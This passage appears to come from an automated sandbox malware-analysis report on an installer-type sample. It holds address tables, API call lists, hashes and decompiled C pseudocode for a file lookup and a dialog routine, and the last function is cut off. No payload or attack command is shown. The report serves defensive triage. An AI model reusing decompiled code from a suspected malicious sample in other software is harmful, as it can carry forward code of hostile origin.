                                                                                                                              0x6f002230
                                                                                                                              0x6f002216
                                                                                                                              0x6f00221f
                                                                                                                              0x6f002222
                                                                                                                              0x6f002222
                                                                                                                              0x00000000
                                                                                                                              0x6f002214
                                                                                                                              0x6f0021e3
                                                                                                                              0x6f0021e6
                                                                                                                              0x6f0021ea
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f0021ec
                                                                                                                              0x00000000
                                                                                                                              0x6f0021ec
                                                                                                                              0x6f0021d5
                                                                                                                              0x6f0021d8
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f0021d8
                                                                                                                              0x6f001dfe
                                                                                                                              0x6f001dfe
                                                                                                                              0x6f001dff
                                                                                                                              0x6f001f49
                                                                                                                              0x6f001f49
                                                                                                                              0x6f001f50
                                                                                                                              0x6f001f53
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f001f60
                                                                                                                              0x00000000
                                                                                                                              0x6f00214b
                                                                                                                              0x6f00214e
                                                                                                                              0x6f002151
                                                                                                                              0x6f002151
                                                                                                                              0x6f002152
                                                                                                                              0x6f002153
                                                                                                                              0x6f002156
                                                                                                                              0x6f002159
                                                                                                                              0x6f00215c
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f00215e
                                                                                                                              0x6f00215e
                                                                                                                              0x6f002162
                                                                                                                              0x6f00217a
                                                                                                                              0x6f00217d
                                                                                                                              0x6f002181
                                                                                                                              0x6f002187
                                                                                                                              0x00000000
                                                                                                                              0x6f002187
                                                                                                                              0x6f002164
                                                                                                                              0x6f002164
                                                                                                                              0x6f002167
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f002169
                                                                                                                              0x6f00216c
                                                                                                                              0x6f00216e
                                                                                                                              0x6f00216f
                                                                                                                              0x6f00216f
                                                                                                                              0x6f00216f
                                                                                                                              0x6f002170
                                                                                                                              0x6f002173
                                                                                                                              0x6f002176
                                                                                                                              0x6f002177
                                                                                                                              0x6f002151
                                                                                                                              0x6f002152
                                                                                                                              0x6f002153
                                                                                                                              0x6f002156
                                                                                                                              0x6f002159
                                                                                                                              0x6f00215c
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f00215c
                                                                                                                              0x00000000
                                                                                                                              0x6f001fa7
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f001fb3
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f001f9a
                                                                                                                              0x6f001f9e
                                                                                                                              0x6f001fa2
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f00211c
                                                                                                                              0x6f002120
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f002126
                                                                                                                              0x6f00212f
                                                                                                                              0x6f002136
                                                                                                                              0x6f00213e
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f002083
                                                                                                                              0x6f002083
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f001fbc
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f0021a6
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f00208b
                                                                                                                              0x6f00208d
                                                                                                                              0x6f00208d
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f002196
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f00219a
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f0021a2
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f0020d3
                                                                                                                              0x6f0020d5
                                                                                                                              0x6f0020d5
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f00209d
                                                                                                                              0x6f00209f
                                                                                                                              0x6f00209f
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f0020af
                                                                                                                              0x6f0020b1
                                                                                                                              0x6f0020b1
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f0020e1
                                                                                                                              0x6f0020e3
                                                                                                                              0x6f0020e3
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f0020ba
                                                                                                                              0x6f0020bc
                                                                                                                              0x6f0020bc
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f0020c1
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f00219e
                                                                                                                              0x6f0021a8
                                                                                                                              0x6f0021a8
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f0020ec
                                                                                                                              0x6f0020f0
                                                                                                                              0x6f0020f5
                                                                                                                              0x6f0020f8
                                                                                                                              0x6f0020f9
                                                                                                                              0x6f0020fc
                                                                                                                              0x6f002102
                                                                                                                              0x6f002102
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f00218e
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f0020c5
                                                                                                                              0x6f0020c7
                                                                                                                              0x6f0020c7
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f001fc3
                                                                                                                              0x6f001fc3
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f0020da
                                                                                                                              0x6f0020dc
                                                                                                                              0x6f0020dc
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f001f67
                                                                                                                              0x6f001f6d
                                                                                                                              0x6f001f70
                                                                                                                              0x6f001f72
                                                                                                                              0x6f001f72
                                                                                                                              0x6f001f75
                                                                                                                              0x6f001f79
                                                                                                                              0x6f001f86
                                                                                                                              0x6f001f88
                                                                                                                              0x6f001f8e
                                                                                                                              0x6f001f8e
                                                                                                                              0x6f001f8e
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f00208e
                                                                                                                              0x6f00208e
                                                                                                                              0x6f002090
                                                                                                                              0x6f002097
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f0020d6
                                                                                                                              0x6f0020d6
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f0020a0
                                                                                                                              0x6f0020a0
                                                                                                                              0x6f0020a2
                                                                                                                              0x6f0020a9
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f0020b2
                                                                                                                              0x6f0020b2
                                                                                                                              0x6f0020b4
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f0020e4
                                                                                                                              0x6f0020e4
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f0020bd
                                                                                                                              0x6f0020bd
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f00210a
                                                                                                                              0x6f00210e
                                                                                                                              0x6f002113
                                                                                                                              0x6f002116
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f0020c8
                                                                                                                              0x6f0020c8
                                                                                                                              0x6f0020cb
                                                                                                                              0x6f0020cd
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f0020dd
                                                                                                                              0x6f0020dd
                                                                                                                              0x6f0020e6
                                                                                                                              0x6f0020e6
                                                                                                                              0x6f001fc5
                                                                                                                              0x6f001fc5
                                                                                                                              0x6f001fc8
                                                                                                                              0x6f001fcf
                                                                                                                              0x6f001fd1
                                                                                                                              0x6f001fd3
                                                                                                                              0x6f001fda
                                                                                                                              0x6f001fdd
                                                                                                                              0x6f001fe2
                                                                                                                              0x6f001fe4
                                                                                                                              0x6f001fe6
                                                                                                                              0x6f001fea
                                                                                                                              0x6f001ff0
                                                                                                                              0x6f001ff6
                                                                                                                              0x6f001ff6
                                                                                                                              0x6f001ff8
                                                                                                                              0x6f001ff8
                                                                                                                              0x6f001ff9
                                                                                                                              0x6f001ff9
                                                                                                                              0x6f001ffd
                                                                                                                              0x6f002003
                                                                                                                              0x6f002005
                                                                                                                              0x6f002009
                                                                                                                              0x6f00200e
                                                                                                                              0x6f00200e
                                                                                                                              0x6f002010
                                                                                                                              0x6f002010
                                                                                                                              0x6f002013
                                                                                                                              0x6f002016
                                                                                                                              0x6f00201f
                                                                                                                              0x6f002025
                                                                                                                              0x6f002028
                                                                                                                              0x6f002028
                                                                                                                              0x6f00202a
                                                                                                                              0x6f00202d
                                                                                                                              0x6f002033
                                                                                                                              0x6f002039
                                                                                                                              0x6f002039
                                                                                                                              0x6f00203b
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f002041
                                                                                                                              0x6f002041
                                                                                                                              0x6f002045
                                                                                                                              0x6f00204c
                                                                                                                              0x6f002070
                                                                                                                              0x6f002070
                                                                                                                              0x6f002074
                                                                                                                              0x6f002076
                                                                                                                              0x6f002079
                                                                                                                              0x6f002079
                                                                                                                              0x6f00207c
                                                                                                                              0x6f00207c
                                                                                                                              0x00000000
                                                                                                                              0x6f002074
                                                                                                                              0x6f002051
                                                                                                                              0x6f002054
                                                                                                                              0x6f002054
                                                                                                                              0x6f00205b
                                                                                                                              0x6f00205d
                                                                                                                              0x6f002060
                                                                                                                              0x6f002067
                                                                                                                              0x6f002068
                                                                                                                              0x6f00206e
                                                                                                                              0x6f00206e
                                                                                                                              0x00000000
                                                                                                                              0x6f00206e
                                                                                                                              0x6f002062
                                                                                                                              0x6f002065
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f002065
                                                                                                                              0x6f001ff2
                                                                                                                              0x6f001ff4
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f001f60
                                                                                                                              0x6f001e05
                                                                                                                              0x6f001e05
                                                                                                                              0x6f001e06
                                                                                                                              0x6f001f46
                                                                                                                              0x00000000
                                                                                                                              0x6f001f46
                                                                                                                              0x6f001e0c
                                                                                                                              0x6f001e0d
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f001e13
                                                                                                                              0x6f001e16
                                                                                                                              0x6f001f0b
                                                                                                                              0x6f001f0b
                                                                                                                              0x6f001f0e
                                                                                                                              0x6f001f23
                                                                                                                              0x6f001f25
                                                                                                                              0x6f001f25
                                                                                                                              0x6f001f26
                                                                                                                              0x6f001f29
                                                                                                                              0x6f001f2c
                                                                                                                              0x6f001f38
                                                                                                                              0x6f001f38
                                                                                                                              0x6f001f38
                                                                                                                              0x6f001f2e
                                                                                                                              0x6f001f2e
                                                                                                                              0x6f001f2e
                                                                                                                              0x6f001f3e
                                                                                                                              0x00000000
                                                                                                                              0x6f001f3e
                                                                                                                              0x6f001f10
                                                                                                                              0x6f001f10
                                                                                                                              0x6f001f11
                                                                                                                              0x6f001f1f
                                                                                                                              0x00000000
                                                                                                                              0x6f001f1f
                                                                                                                              0x6f001f14
                                                                                                                              0x6f001f15
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f001f1b
                                                                                                                              0x00000000
                                                                                                                              0x6f001f1b
                                                                                                                              0x6f001e1c
                                                                                                                              0x6f001f07
                                                                                                                              0x00000000
                                                                                                                              0x6f001f07
                                                                                                                              0x6f001e22
                                                                                                                              0x6f001e22
                                                                                                                              0x6f001e25
                                                                                                                              0x6f001e4e
                                                                                                                              0x00000000
                                                                                                                              0x6f001e4e
                                                                                                                              0x6f001e27
                                                                                                                              0x6f001e27
                                                                                                                              0x6f001e2a
                                                                                                                              0x6f001e44
                                                                                                                              0x00000000
                                                                                                                              0x6f001e44
                                                                                                                              0x6f001e2c
                                                                                                                              0x6f001e2c
                                                                                                                              0x6f001e2f
                                                                                                                              0x6f001e3e
                                                                                                                              0x00000000
                                                                                                                              0x6f001e3e
                                                                                                                              0x6f001e32
                                                                                                                              0x6f001e33
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f001e35
                                                                                                                              0x00000000
                                                                                                                              0x6f001cec
                                                                                                                              0x6f001cec
                                                                                                                              0x6f001cef
                                                                                                                              0x00000000
                                                                                                                              0x6f001cef
                                                                                                                              0x6f001ce6
                                                                                                                              0x6f001cd3
                                                                                                                              0x6f001cd8
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f001cda
                                                                                                                              0x6f001cdd
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f001cdd
                                                                                                                              0x6f001c6d
                                                                                                                              0x6f001c70
                                                                                                                              0x6f001ca6
                                                                                                                              0x6f001ca9
                                                                                                                              0x00000000
                                                                                                                              0x6f001caf
                                                                                                                              0x6f001cb1
                                                                                                                              0x6f001cb5
                                                                                                                              0x6f001cbc
                                                                                                                              0x6f001cc3
                                                                                                                              0x6f001cc6
                                                                                                                              0x6f001cc9
                                                                                                                              0x00000000
                                                                                                                              0x6f001cc9
                                                                                                                              0x6f001ca9
                                                                                                                              0x6f001c72
                                                                                                                              0x6f001c73
                                                                                                                              0x6f001c8e
                                                                                                                              0x6f001c91
                                                                                                                              0x00000000
                                                                                                                              0x6f001c97
                                                                                                                              0x6f001c97
                                                                                                                              0x6f001c9e
                                                                                                                              0x6f001ca1
                                                                                                                              0x00000000
                                                                                                                              0x6f001ca1
                                                                                                                              0x6f001c91
                                                                                                                              0x6f001c78
                                                                                                                              0x00000000
                                                                                                                              0x6f001c7e
                                                                                                                              0x6f001c7e
                                                                                                                              0x6f001c85
                                                                                                                              0x00000000
                                                                                                                              0x6f001c85
                                                                                                                              0x6f001c78
                                                                                                                              0x6f001e74
                                                                                                                              0x6f001e79
                                                                                                                              0x6f001e7e
                                                                                                                              0x6f001e82
                                                                                                                              0x6f002355
                                                                                                                              0x6f00235b
                                                                                                                              0x6f001e94
                                                                                                                              0x6f001e96
                                                                                                                              0x6f001e97
                                                                                                                              0x6f00227e
                                                                                                                              0x6f00227e
                                                                                                                              0x6f002281
                                                                                                                              0x6f002284
                                                                                                                              0x6f0022a1
                                                                                                                              0x6f0022a7
                                                                                                                              0x6f0022a9
                                                                                                                              0x6f0022af
                                                                                                                              0x6f0022c6
                                                                                                                              0x6f0022c6
                                                                                                                              0x6f0022c6
                                                                                                                              0x6f0022d3
                                                                                                                              0x6f0022d9
                                                                                                                              0x6f0022dc
                                                                                                                              0x6f0022e2
                                                                                                                              0x6f0022e4
                                                                                                                              0x6f0022e8
                                                                                                                              0x6f0022ea
                                                                                                                              0x6f0022f1
                                                                                                                              0x6f0022f6
                                                                                                                              0x6f0022f9
                                                                                                                              0x6f0022fb
                                                                                                                              0x6f002300
                                                                                                                              0x6f002312
                                                                                                                              0x6f002312
                                                                                                                              0x6f002300
                                                                                                                              0x6f0022f9
                                                                                                                              0x6f0022e8
                                                                                                                              0x6f002318
                                                                                                                              0x6f00231b
                                                                                                                              0x6f002325
                                                                                                                              0x6f00232d
                                                                                                                              0x6f00233a
                                                                                                                              0x6f002340
                                                                                                                              0x6f002343
                                                                                                                              0x6f002273
                                                                                                                              0x6f002273
                                                                                                                              0x00000000
                                                                                                                              0x6f002273
                                                                                                                              0x6f002349
                                                                                                                              0x6f00234f
                                                                                                                              0x6f00234f
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f002351
                                                                                                                              0x6f002351
                                                                                                                              0x6f002351
                                                                                                                              0x6f002351
                                                                                                                              0x00000000
                                                                                                                              0x6f00231d
                                                                                                                              0x6f00231d
                                                                                                                              0x6f002323
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f002323
                                                                                                                              0x6f00231b
                                                                                                                              0x6f0022b2
                                                                                                                              0x6f0022b8
                                                                                                                              0x6f0022ba
                                                                                                                              0x6f0022c0
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f0022c0
                                                                                                                              0x6f002286
                                                                                                                              0x6f00228d
                                                                                                                              0x6f002293
                                                                                                                              0x6f002299
                                                                                                                              0x00000000
                                                                                                                              0x6f002299
                                                                                                                              0x6f001e9d
                                                                                                                              0x6f001e9e
                                                                                                                              0x6f00225d
                                                                                                                              0x6f00225d
                                                                                                                              0x6f002263
                                                                                                                              0x6f002266
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f00226d
                                                                                                                              0x6f002272
                                                                                                                              0x00000000
                                                                                                                              0x6f002272
                                                                                                                              0x6f001ea5
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f001eab
                                                                                                                              0x6f001eab
                                                                                                                              0x6f001eb4
                                                                                                                              0x6f001eb9
                                                                                                                              0x6f001ebf
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f001ec5
                                                                                                                              0x6f001ed2
                                                                                                                              0x6f001ed8
                                                                                                                              0x6f001ee2
                                                                                                                              0x6f001ee8
                                                                                                                              0x6f001ef0
                                                                                                                              0x6f001f00
                                                                                                                              0x00000000
                                                                                                                              0x6f001f00

                                                                                                                              APIs
                                                                                                                                • Part of subcall function 6F0012BB: GlobalAlloc.KERNELBASE(00000040,?,6F0012DB,?,6F00137F,00000019,6F0011CA,-000000A0), ref: 6F0012C5
                                                                                                                              • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 6F001D2D
                                                                                                                              • lstrcpyW.KERNEL32(00000008,?), ref: 6F001D75
                                                                                                                              • lstrcpyW.KERNEL32(00000808,?), ref: 6F001D7F
                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 6F001D92
                                                                                                                              • GlobalFree.KERNEL32(?), ref: 6F001E74
                                                                                                                              • GlobalFree.KERNEL32(?), ref: 6F001E79
                                                                                                                              • GlobalFree.KERNEL32(?), ref: 6F001E7E
                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 6F002068
                                                                                                                              • lstrcpyW.KERNEL32(?,?), ref: 6F002222
                                                                                                                              • GetModuleHandleW.KERNEL32(00000008), ref: 6F0022A1
                                                                                                                              • LoadLibraryW.KERNELBASE(00000008), ref: 6F0022B2
                                                                                                                              • GetProcAddress.KERNEL32(?,?), ref: 6F00230C
                                                                                                                              • lstrlenW.KERNEL32(00000808), ref: 6F002326
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.41989007349.000000006F001000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.41988874344.000000006F000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41989151475.000000006F004000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41989215917.000000006F006000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_6f000000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 245916457-0
                                                                                                                              • Opcode ID: 5d19c3750ce5d4d67af123428285df785c43595957356bcae2dd80062b3bd3f2
                                                                                                                              • Instruction ID: 282dcc71154e3551d3a1a08488de2283cea933e7ee58d8259b9c98928eaea2e2
                                                                                                                              • Opcode Fuzzy Hash: 5d19c3750ce5d4d67af123428285df785c43595957356bcae2dd80062b3bd3f2
                                                                                                                              • Instruction Fuzzy Hash: 52228B71D0464AEAEB10EFA8CA807EEB7F5FF05319F50462ED165E7280D774A681CB50
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00406850 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 946 406850-406864 FindFirstFileW 947 406871 946->947 948 406866-40686f FindClose 946->948 949 406873-406874 947->949 948->949
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E00406850(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x7a4f98); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x7a4f98;
			}




                                                                                                                              0x0040685b
                                                                                                                              0x00406864
                                                                                                                              0x00000000
                                                                                                                              0x00406871
                                                                                                                              0x00406867
                                                                                                                              0x00000000

                                                                                                                              APIs
                                                                                                                              • FindFirstFileW.KERNELBASE(76D73420,007A4F98,C:\Users\user\AppData\Local\Temp\nso8B47.tmp,00405F3A,C:\Users\user\AppData\Local\Temp\nso8B47.tmp,C:\Users\user\AppData\Local\Temp\nso8B47.tmp,00000000,C:\Users\user\AppData\Local\Temp\nso8B47.tmp,C:\Users\user\AppData\Local\Temp\nso8B47.tmp,76D73420,?,C:\Users\user\AppData\Local\Temp\,00405C46,?,76D73420,C:\Users\user\AppData\Local\Temp\), ref: 0040685B
                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00406867
                                                                                                                              Strings
                                                                                                                              • C:\Users\user\AppData\Local\Temp\nso8B47.tmp, xrefs: 00406850
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.41959952306.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.41959904662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960027525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960080093.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961705865.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961753112.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961803590.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962021828.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962062973.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962107808.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962161287.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962210692.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962256309.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962332064.00000000007D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Find$CloseFileFirst
                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\nso8B47.tmp
                                                                                                                              • API String ID: 2295610775-4031543071
                                                                                                                              • Opcode ID: 93d274fea3e94b44f6f55b1f097fc665565d90e42f153d0ad468ae4ce1295179
                                                                                                                              • Instruction ID: 4aa2ce40dd0fdaaf15299f79bbf0ddad0ee07bd1ec444a92f9406ee76b8f93c8
                                                                                                                              • Opcode Fuzzy Hash: 93d274fea3e94b44f6f55b1f097fc665565d90e42f153d0ad468ae4ce1295179
                                                                                                                              • Instruction Fuzzy Hash: 3CD012365592205FC7402779AE0CC4B7A689F563313268B36B0EAF11F0CA74CC3296ED
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00403F77 Relevance: 51.4, APIs: 34, Instructions: 357windowstringCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 194 403f77-403f89 195 4040f0-4040ff 194->195 196 403f8f-403f95 194->196 198 404101-404149 GetDlgItem * 2 call 404476 SetClassLongW call 40140b 195->198 199 40414e-404163 195->199 196->195 197 403f9b-403fa4 196->197 202 403fa6-403fb3 SetWindowPos 197->202 203 403fb9-403fc0 197->203 198->199 200 4041a3-4041a8 call 4044c2 199->200 201 404165-404168 199->201 213 4041ad-4041c8 200->213 205 40416a-404175 call 401389 201->205 206 40419b-40419d 201->206 202->203 208 403fc2-403fdc ShowWindow 203->208 209 404004-40400a 203->209 205->206 230 404177-404196 SendMessageW 205->230 206->200 212 404443 206->212 214 403fe2-403ff5 GetWindowLongW 208->214 215 4040dd-4040eb call 4044dd 208->215 216 404023-404026 209->216 217 40400c-40401e DestroyWindow 209->217 224 404445-40444c 212->224 221 4041d1-4041d7 213->221 222 4041ca-4041cc call 40140b 213->222 214->215 223 403ffb-403ffe ShowWindow 214->223 215->224 227 404028-404034 SetWindowLongW 216->227 228 404039-40403f 216->228 225 404420-404426 217->225 234 404401-40441a DestroyWindow EndDialog 221->234 235 4041dd-4041e8 221->235 222->221 223->209 225->212 233 404428-40442e 225->233 227->224 228->215 229 404045-404054 GetDlgItem 228->229 236 404073-404076 229->236 237 404056-40406d SendMessageW IsWindowEnabled 229->237 230->224 233->212 238 404430-404439 ShowWindow 233->238 234->225 235->234 239 4041ee-40423b call 406557 call 404476 * 3 GetDlgItem 235->239 240 404078-404079 236->240 241 40407b-40407e 236->241 237->212 237->236 238->212 266 404245-404281 ShowWindow KiUserCallbackDispatcher call 404498 EnableWindow 239->266 267 40423d-404242 239->267 243 4040a9-4040ae call 40444f 240->243 244 404080-404086 241->244 245 40408c-404091 241->245 243->215 248 4040c7-4040d7 SendMessageW 244->248 249 404088-40408a 244->249 245->248 250 404093-404099 245->250 248->215 249->243 254 4040b0-4040b9 call 40140b 250->254 255 40409b-4040a1 call 40140b 250->255 254->215 263 4040bb-4040c5 254->263 264 4040a7 255->264 263->264 264->243 270 404283-404284 266->270 271 404286 266->271 267->266 272 404288-4042b6 GetSystemMenu EnableMenuItem SendMessageW 270->272 271->272 273 4042b8-4042c9 SendMessageW 272->273 274 4042cb 272->274 275 4042d1-404310 call 4044ab call 403f58 call 40651a lstrlenW call 406557 SetWindowTextW call 401389 273->275 274->275 275->213 286 404316-404318 275->286 286->213 287 40431e-404322 286->287 288 404341-404355 DestroyWindow 287->288 289 404324-40432a 287->289 288->225 290 40435b-404388 CreateDialogParamW 288->290 289->212 291 404330-404336 289->291 290->225 292 40438e-4043e5 call 404476 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 290->292 291->213 293 40433c 291->293 292->212 298 4043e7-4043fa ShowWindow call 4044c2 292->298 293->212 300 4043ff 298->300 300->225
                                                                                                                              C-Code - Quality: 86%
                                                                                                                              			E00403F77(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
				struct HWND__* _v28;
				void* _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				signed int _t36;
				signed int _t38;
				struct HWND__* _t48;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t117;
				int _t118;
				int _t122;
				signed int _t124;
				struct HWND__* _t127;
				struct HWND__* _t128;
				int _t129;
				intOrPtr _t130;
				long _t133;
				int _t135;
				int _t136;
				void* _t137;

				_t130 = _a8;
				if(_t130 == 0x110 || _t130 == 0x408) {
					_t34 = _a12;
					_t127 = _a4;
					__eflags = _t130 - 0x110;
					 *0x7a1f30 = _t34;
					if(_t130 == 0x110) {
						 *0x7a8a68 = _t127;
						 *0x7a1f44 = GetDlgItem(_t127, 1);
						_t91 = GetDlgItem(_t127, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x79ff10 = _t91;
						E00404476(_t127);
						SetClassLongW(_t127, 0xfffffff2,  *0x7a7a48);
						 *0x7a7a2c = E0040140B(4);
						_t34 = 1;
						__eflags = 1;
						 *0x7a1f30 = 1;
					}
					_t124 =  *0x40a368; // 0x0
					_t136 = 0;
					_t133 = (_t124 << 6) +  *0x7a8a80;
					__eflags = _t124;
					if(_t124 < 0) {
						L36:
						E004044C2(0x40b);
						while(1) {
							_t36 =  *0x7a1f30;
							 *0x40a368 =  *0x40a368 + _t36;
							_t133 = _t133 + (_t36 << 6);
							_t38 =  *0x40a368; // 0x0
							__eflags = _t38 -  *0x7a8a84;
							if(_t38 ==  *0x7a8a84) {
								E0040140B(1);
							}
							__eflags =  *0x7a7a2c - _t136;
							if( *0x7a7a2c != _t136) {
								break;
							}
							__eflags =  *0x40a368 -  *0x7a8a84; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t133 + 0x14);
							E00406557(_t117, _t127, _t133, 0x7b8000,  *((intOrPtr*)(_t133 + 0x24)));
							_push( *((intOrPtr*)(_t133 + 0x20)));
							_push(0xfffffc19);
							E00404476(_t127);
							_push( *((intOrPtr*)(_t133 + 0x1c)));
							_push(0xfffffc1b);
							E00404476(_t127);
							_push( *((intOrPtr*)(_t133 + 0x28)));
							_push(0xfffffc1a);
							E00404476(_t127);
							_t48 = GetDlgItem(_t127, 3);
							__eflags =  *0x7a8aec - _t136;
